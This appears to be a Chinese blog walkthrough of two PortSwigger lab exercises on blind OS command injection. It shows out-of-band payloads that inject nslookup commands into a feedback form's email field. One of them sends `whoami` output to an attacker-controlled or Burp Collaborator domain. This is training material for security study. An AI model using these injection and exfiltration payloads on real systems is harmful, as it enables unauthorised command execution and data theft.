【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(下)

简介: 【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(下)

5、利用带外(OAST)技术


1、简述:


可以使用一个注入命令,该命令将触发与您使用OAST技术控制的系统的带外网络交互。例如:


& nslookup kgji2ohoyw.web-attacker.com &


此有效负载使用nslookup命令对指定的域进行DNS查找。攻击者可以监视指定查找的发生,从而检测到命令已成功插入。  


2、带外通道还提供了一种从注入命令中提取输出的简单方法:


& nslookup `whoami`.kgji2ohoyw.web-attacker.com &


这将导致对攻击者的域进行DNS查找,该域包含whoami命令:


wwwuser.kgji2ohoyw.web-attacker.com


2、涉及实验:

实验4:具有带外交互的盲OS命令注入

实验5:具有带外数据泄漏的盲操作系统命令注入


实验4:具有带外交互的盲OS命令注入


part1:

填写反馈信息

使用Burp Suite拦截和修改提交反馈的请求

658153bffa834ad0918321b9814f1a8f.png

part2:


打开BP的Collaborator客户端


fdf98b49a17c44ff87c043df974ce757.png


复制服务器URL(这个是我的BP的提供的服务器)


4injhpna543tc1766dwv1466ux0noc.burpcollaborator.net

d6c91bf15b3741f887621742792b13c6.png


part3:


发送到repeater


修改email参数,将其更改为:


email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
我的是:
email=x||nslookup+4injhpna543tc1766dwv1466ux0noc.burpcollaborator.net||


8dfa4b15f0cf49b9997d321b161fae01.png

e0f22ea77f074a11b9bfb9e765de5bdb.png


part4:


修改数据包,并关闭拦截

b08e3e4f907441c492a819e9f1df6f3a.png

af00473bff264d8bbe32254e2363684d.png


fa8a4fe9fc1543b18b9a4d2afc8d31a1.png




实验5:具有带外数据泄漏的盲操作系统命令注入


part1:


填写反馈信息


使用Burp Suite拦截和修改提交反馈的请求


b5b12fa972cc40538ce2bdd921ef8f7d.png


part2:


打开BP的Collaborator客户端


aeb1c90ed00a4d20a791ab8aa8516299.png


复制服务器URL(这个是我的BP的提供的服务器)


fl45n2ug5x4nmill7s67s7u7jypodd.burpcollaborator.net

3da5d9d997a744da8a4693c8cbbe91fe.png


part3:


发送到repeater


修改email参数,将其更改为:


email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
我的是:
email=x||nslookup+`whoami`.fl45n2ug5x4nmill7s67s7u7jypodd.burpcollaborator.net||


84a6db8d16b749ddafb436e9c78e62af.png

613c6d2f27a1463cbab6e3819a30ac67.png


part4:


修改数据包,并关闭拦截

c781c339afe44a84936077093734876a.png


bc96a9a5f1b749b3bce7b6bc7d886cb2.png


part5:


完成实验


我的用户peter-WKvUPX

04f4a3e0d5c54fc58b32546c07bddd59.png

d45cd798c33945108995a0328f4ddc36.png

7a9d5210e3524ca882aa9399a0bd0a56.png


2e4bc22d6f9843fb8ea48104d99862c6.png


7d62be979184459ab44139ed85f387fe.png

目录
相关文章
|
14天前
|
弹性计算 人工智能 运维
摆脱繁琐命令-让运维更加流畅-阿里云ECS操作系统控制台运维篇
阿里云操作系统控制台提供了便捷的服务器监控与管理功能,简化了运维工作。通过将多台服务器纳入统一监控平台,用户可以快速查看CPU、内存、磁盘和网络等关键资源的使用情况,避免了逐一远程连接查询的繁琐操作。此外,该工具支持自动化数据汇总,极大地方便了日报、周报和月报的编写。测试过程中,系统展示了良好的稳定性和响应速度,尤其在网络抖动和大文件健康状态测试中表现出色。整体体验流畅,显著提升了运维效率。 操作系统控制台地址:[点击访问](https://alinux.console.aliyun.com/)
58 26
摆脱繁琐命令-让运维更加流畅-阿里云ECS操作系统控制台运维篇
|
4月前
|
算法
数据结构实验之操作系统打印机管理器问题
本实验旨在通过实现操作系统中的打印机管理器问题,掌握队列的基本操作如入队、出队等,利用队列的先进先出特性解决先申请先打印的问题。实验包括队列的初始化、入队、出队、打印队列内容等功能,并通过菜单式界面进行交互。实验结果显示基本功能可正常执行,但在连续操作时存在执行失败的情况,需进一步优化。
74 4
|
1月前
|
安全 前端开发 开发工具
【01】鸿蒙实战应用开发-华为鸿蒙纯血操作系统Harmony OS NEXT-项目开发实战-优雅草卓伊凡拟开发一个一站式家政服务平台-前期筹备-暂定取名斑马家政软件系统-本项目前端开源-服务端采用优雅草蜻蜓Z系统-搭配ruoyi框架admin后台-全过程实战项目分享-从零开发到上线
【01】鸿蒙实战应用开发-华为鸿蒙纯血操作系统Harmony OS NEXT-项目开发实战-优雅草卓伊凡拟开发一个一站式家政服务平台-前期筹备-暂定取名斑马家政软件系统-本项目前端开源-服务端采用优雅草蜻蜓Z系统-搭配ruoyi框架admin后台-全过程实战项目分享-从零开发到上线
75 5
【01】鸿蒙实战应用开发-华为鸿蒙纯血操作系统Harmony OS NEXT-项目开发实战-优雅草卓伊凡拟开发一个一站式家政服务平台-前期筹备-暂定取名斑马家政软件系统-本项目前端开源-服务端采用优雅草蜻蜓Z系统-搭配ruoyi框架admin后台-全过程实战项目分享-从零开发到上线
|
2月前
|
弹性计算 前端开发 Ubuntu
OS Copilot全命令测评报告
作为一名Web前端工程师,我使用OS Copilot的`-t`、`-f`和`|`功能进行了测试。通过创建ECS实例并安装OS Copilot,我顺利完成了以下任务: 1. 环境搭建:使用`-t`参数获取了详细的静态页面发布步骤,解决了环境配置问题 2. 多步操作:借助`-f`参数自动化安装和配置httpd服务器,简化了多步骤操作 3. 文件分析:利用`|`功能分析HTML文件内容,确认是否符合预期 整个过程顺畅无阻,特别是`-t`和`-f`功能极大提高了工作效率。建议将这些功能设为默认自带,以减少安装步骤。总结来说,OS Copilot在处理复杂任务时表现出色,提供了详尽的操作指引和自动化支持
39 8
|
5月前
|
Linux 编译器 C语言
./build.sh:行1: g++: 未找到命令的错误问题在centos操作系统下面如何解决
通过上述步骤,您应该能够有效地解决CentOS系统中 `g++: 未找到命令`的错误。确保软件开发环境配置得当,对于顺利执行编译脚本和日常开发工作至关重要。如果问题依然存在,考虑检查脚本内的命令路径引用是否正确,或进一步排查系统配置问题。
250 0
|
5月前
|
存储 Java iOS开发
MacOS环境-手写操作系统-43-dir命令的实现 和 文件写入
MacOS环境-手写操作系统-43-dir命令的实现 和 文件写入
71 0
|
8月前
|
弹性计算 运维
阿里云操作系统智能助手OS Copilot实验测评报告
**OS Copilot 产品体验与功能反馈摘要** 运维人员发现OS Copilot易上手,文档清晰,助其高效排查故障(8/10分)。愿意推荐并参与开源开发。亮点在于知识问答,能快速筛选答案。相较于竞品,优点是新手友好、文档清晰,但功能扩展性待增强。期望增加系统错误排查与解决方案,并集成ECS等,以优化系统安装流程。
阿里云操作系统智能助手OS Copilot实验测评报告
|
8月前
|
弹性计算 运维 自然语言处理
阿里云操作系统智能助手OS Copilot实验测评报告
OS Copilot是针对Linux的智能助手,助力学习、运维及编程。用户界面直观,自然语言交互方便新手。官方文档详尽,但初次配置略复杂,适合学生和开发者。在提高代码编写和调试效率、系统学习上得分高,功能亮点包括代码生成、问答和命令执行。用户期待更多操作系统支持、自动错误分析和系统排查功能。
224 3
|
8月前
|
弹性计算 人工智能 运维
阿里云操作系统智能助手OS Copilot实验测评报告
阿里云操作系统智能助手OS Copilot实验测评报告
139 2
|
8月前
|
弹性计算 运维 监控
阿里云操作系统智能助手OS Copilot实验测评报告
阿里云OS Copilot助力学生提升学习效率,简化Linux操作。作为学生,体验者发现它在代码理解和诊断上极具价值,给予新手友好体验,但存在命令执行限制和错误处理问题。评分10/10,愿推荐并参与未来开发。功能上,知识问答、辅助编程和命令执行深受喜爱。对比其他产品,OS Copilot简洁集成,但需改善多命令支持和错误分析。期望支持更多操作系统及与ACK等工具联动,增强系统管理和故障排查。
62 1

热门文章

最新文章